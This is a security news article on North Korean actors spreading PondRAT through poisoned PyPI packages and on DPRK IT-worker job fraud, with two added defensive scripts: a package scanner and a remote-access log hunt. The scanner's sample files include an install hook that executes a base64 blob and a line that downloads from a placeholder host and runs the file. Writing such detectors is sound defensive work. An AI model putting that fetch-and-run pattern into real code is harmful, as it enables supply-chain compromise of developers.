Python Packages Target Software Developers

Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign.

PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has previously been attributed to the Lazarus Group and was deployed in attacks related to the 2023 3CX supply chain compromise.

Some of these attacks are part of a persistent cyber attack campaign dubbed Operation Dream Job, wherein prospective targets are lured with enticing job offers in an attempt to trick them into downloading malware.

"The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular repository of open-source Python packages," Unit 42 researcher Yoav Zemah said, linking the activity with moderate confidence to a threat actor called Gleaming Pisces.


The adversary is also tracked by the wider cybersecurity community under the names Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736, a sub-cluster within the Lazarus Group that's also known for distributing the AppleJeus malware.

It's believed that the end goal of the attacks is to "secure access to supply chain vendors through developers' endpoints and subsequently gain access to the vendors' customers' endpoints, as observed in previous incidents."

The list of malicious packages, now removed from the PyPI repository, is below -

The infection chain is straightforward: once the packages are downloaded and installed on a developer's system, they execute an encoded next stage, which in turn retrieves the Linux and macOS builds of the RAT from a remote server and runs them.
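The install-time pattern just described (a package whose setup.py or module decodes an embedded blob and executes it, or fetches and runs a next stage) can be screened for statically before anything is installed. The scanner below is an added example, not Unit 42's tooling and not code from the packages in question; the three sample files it checks are constructed, and the dummy blob "QUJD" simply decodes to "ABC". It walks the AST of each file and flags exec/eval over decoded data, shell and network calls, and custom setuptools command classes, which are the hooks that run during `pip install`:

```python
"""Static scan of a Python package for install-time or import-time code
execution. Added example, not Unit 42's tooling and not code from the
packages discussed in the article; the sample files below are constructed."""
import ast
import pathlib

# Call targets that mean "run code or commands" in a setup.py or __init__.py.
EXEC_CALLS = {"exec", "eval"}
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.Popen", "subprocess.check_output"}
DECODE_CALLS = {"base64.b64decode", "base64.b32decode", "base64.b85decode",
                "codecs.decode", "zlib.decompress", "bytes.fromhex"}
NETWORK_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
                 "requests.get", "requests.post", "socket.socket"}
# setuptools command classes whose run() executes during `pip install`.
SETUPTOOLS_HOOKS = {"install", "develop", "egg_info", "build_py"}


def dotted_name(node):
    """'a.b.c' for a Name/Attribute chain, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def contains_call(node, names):
    """True if any call nested under `node` targets one of `names`."""
    return any(isinstance(sub, ast.Call) and dotted_name(sub.func) in names
               for sub in ast.walk(node))


def scan_source(source, filename="<package>"):
    """Return sorted (line, reason) findings for one Python source file."""
    findings = []
    tree = ast.parse(source, filename)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in EXEC_CALLS:
                how = ("on a decoded/decompressed blob"
                       if contains_call(node, DECODE_CALLS) else "of dynamic code")
                findings.append((node.lineno, f"{name}() {how}"))
            elif name in SHELL_CALLS:
                findings.append((node.lineno, f"shell command via {name}()"))
            elif name in NETWORK_CALLS:
                findings.append((node.lineno, f"network fetch via {name}()"))
        elif isinstance(node, ast.ClassDef):
            if {dotted_name(b) for b in node.bases} & SETUPTOOLS_HOOKS:
                findings.append((node.lineno,
                                 f"custom setuptools command class {node.name}"))
    return sorted(findings)


def scan_package_dir(root):
    """Scan every .py file under an unpacked sdist/wheel; {relative path: findings}."""
    root = pathlib.Path(root)
    results = {}
    for path in root.rglob("*.py"):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"), str(path))
        if hits:
            results[str(path.relative_to(root))] = hits
    return results


# Constructed samples, not real package contents. "QUJD" is a dummy blob that
# decodes to b"ABC"; it stands in for an encoded next stage.
MALICIOUS_SETUP = '''
import base64
from setuptools import setup
from setuptools.command.install import install

BLOB = "QUJD"

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(base64.b64decode(BLOB))

setup(name="totally-legit-utils", version="0.1", cmdclass={"install": PostInstall})
'''

STAGE_TWO_INIT = '''
import os
import urllib.request
urllib.request.urlretrieve("https://example.invalid/next-stage", "/tmp/.cache")
os.system("chmod +x /tmp/.cache && /tmp/.cache")
'''

BENIGN_SETUP = '''
from setuptools import setup

setup(name="real-utils", version="1.0", packages=["real_utils"])
'''

if __name__ == "__main__":
    for label, src in [("malicious setup.py", MALICIOUS_SETUP),
                       ("stage-two __init__.py", STAGE_TWO_INIT),
                       ("benign setup.py", BENIGN_SETUP)]:
        print(label, scan_source(src) or "clean")
```

Run `scan_package_dir` against the extracted archive from `pip download --no-deps --no-binary :all: <name>` before the package ever reaches `pip install`; a finding is a reason to read the file, not proof of malice, since legitimate packages occasionally shell out from setup.py too.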


Further analysis of PondRAT has revealed similarities with both POOLRAT and AppleJeus, with the attacks also distributing new Linux variants of POOLRAT.

"The Linux and macOS versions [of POOLRAT] use an identical function structure for loading their configurations, featuring similar method names and functionality," Zemah said.

"Additionally, the method names in both variants are strikingly similar, and the strings are almost identical. Lastly, the mechanism that handles commands from the [command-and-control server] is nearly identical."

PondRAT, a leaner version of POOLRAT, comes with capabilities to upload and download files, pause operations for a predefined time interval, and execute arbitrary commands.

"The evidence of additional Linux variants of POOLRAT showed that Gleaming Pisces has been enhancing its capabilities across both Linux and macOS platforms," Unit 42 said.

"The weaponization of legitimate-looking Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can result in malware infection that compromises an entire network."

The disclosure comes as KnowBe4, which was duped into hiring a North Korean threat actor as an employee, said more than a dozen companies "either hired North Korean employees or had been besieged by a multitude of fake resumes and applications submitted by North Koreans hoping to get a job with their organization."


It described the activity, tracked by CrowdStrike under the moniker Famous Chollima, as a "complex, industrial, scaled nation-state operation" and that it poses a "serious risk for any company with remote-only employees."

Mandiant Details TTPs of North Korea IT Workers

Google-owned Mandiant, which has assigned the name UNC5267 to North Korea IT worker operations, said it consists of individuals sent by the government to live in China, Russia, and to a lesser extent in Africa and Southeast Asia, to land lucrative jobs within Western companies, specifically in the U.S. tech sector.

"UNC5267 gains initial access through the use of stolen identities to apply for various positions or are brought in as a contractor," it said. "UNC5267 operators have primarily applied for positions that offer 100% remote work."

The threat intelligence firm further noted that a single DPRK IT worker could be working multiple jobs at once, drawing salaries from different companies on a monthly basis.

The long term objectives of the activity cluster include financial gain via illicit salary withdrawals, maintaining long-term access to victim networks, and likely abusing the unauthorized access for espionage or disruptive activity.

"A recurring characteristic of resumes utilized by UNC5267 is the use of addresses based in the United States coupled with education credentials from universities outside of North America, frequently in countries such as Singapore, Japan, or Hong Kong," Mandiant said.

As previously disclosed by CrowdStrike, UNC5267 actors accomplish their duties by remotely connecting to company-issued laptops using tools like GoToRemote, GoToMeeting, Chrome Remote Desktop, AnyDesk, and TeamViewer. These connections originate from IP addresses associated with Astrill VPN.
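Those two observations, a remote-control tool on a company laptop and a session peer inside a commercial VPN's address space, translate directly into a hunt. The script below is an added example, not CrowdStrike's or Mandiant's tooling; its telemetry format, process names and VPN ranges are all assumptions, the ranges being TEST-NET placeholders that must be replaced with the provider's addresses actually observed in your environment. It also flags one peer address steering several laptops, which is what a laptop farm run by a worker holding multiple jobs would look like:

```python
"""Hunt for company laptops driven over a remote-control tool from a
commercial VPN. Added example, not CrowdStrike's or Mandiant's tooling. The
log format, process names and VPN ranges are assumptions; the ranges are
TEST-NET placeholders."""
import ipaddress
from collections import defaultdict

# Process names assumed for the tools named in the article (match to your EDR).
REMOTE_TOOLS = {"anydesk.exe", "teamviewer.exe", "remoting_host.exe", "g2mcomm.exe"}

# Placeholder egress ranges standing in for the VPN provider's IP space.
VPN_RANGES = [ipaddress.ip_network("198.51.100.0/24"),
              ipaddress.ip_network("203.0.113.0/24")]


def parse_event(line):
    """Parse 'ts key=value ...' into a dict; None for blank or malformed lines."""
    parts = line.split()
    if len(parts) < 2:
        return None
    event = {"ts": parts[0]}
    for token in parts[1:]:
        if "=" not in token:
            return None
        key, value = token.split("=", 1)
        event[key] = value
    return event


def in_ranges(ip, ranges):
    """True if `ip` parses and falls inside any of `ranges`."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ranges)


def analyze(log_text, vpn_ranges=VPN_RANGES):
    """Return (rule, subject, detail) alerts for a batch of connection events."""
    alerts = []
    hosts_by_peer = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_event(line)
        if not ev or ev.get("proc", "").lower() not in REMOTE_TOOLS:
            continue
        peer, host = ev.get("peer"), ev.get("host")
        if not peer or not host:
            continue
        hosts_by_peer[peer].add(host)
        # Rule 1: remote-control session whose peer sits in a VPN egress range.
        if in_ranges(peer, vpn_ranges):
            alerts.append(("vpn_remote_control", host,
                           f"{ev.get('user', '?')} via {ev['proc']} from {peer}"))
    # Rule 2: one peer address steering several laptops (laptop-farm pattern).
    for peer, hosts in hosts_by_peer.items():
        if len(hosts) > 1:
            alerts.append(("shared_operator", peer, ",".join(sorted(hosts))))
    return alerts


# Constructed sample telemetry: TEST-NET addresses, invented hosts and users.
SAMPLE_LOG = """\
2024-09-20T13:02:11Z host=LT-0412 user=jdoe proc=AnyDesk.exe peer=198.51.100.23 dport=443
2024-09-20T13:05:40Z host=LT-0412 user=jdoe proc=chrome.exe peer=192.0.2.10 dport=443
2024-09-20T13:41:03Z host=LT-0577 user=asmith proc=TeamViewer.exe peer=198.51.100.23 dport=5938
2024-09-20T14:12:55Z host=LT-0199 user=blee proc=remoting_host.exe peer=192.0.2.77 dport=443
this line is malformed and must be skipped
"""

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(*alert)
```

The third sample event, a Chrome Remote Desktop session from an address outside the VPN ranges, produces no alert on its own: the rule is the combination of tool and source, not the tool alone, since IT support uses the same software. Pair the hits with the shipping-address check described next for a much stronger signal than either gives alone.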

Another noteworthy aspect is the discrepancy between the location where the worker claims to live and the address to which the company laptop is actually shipped (i.e., a laptop farm). The IT workers have also been observed using stolen identities to secure jobs.

"North Korea's IT workforce, despite operating under significant constraints, presents a persistent and escalating cyber threat," Mandiant said. "The dual motivations behind their activities — fulfilling state objectives and pursuing personal financial gains—make them particularly dangerous."
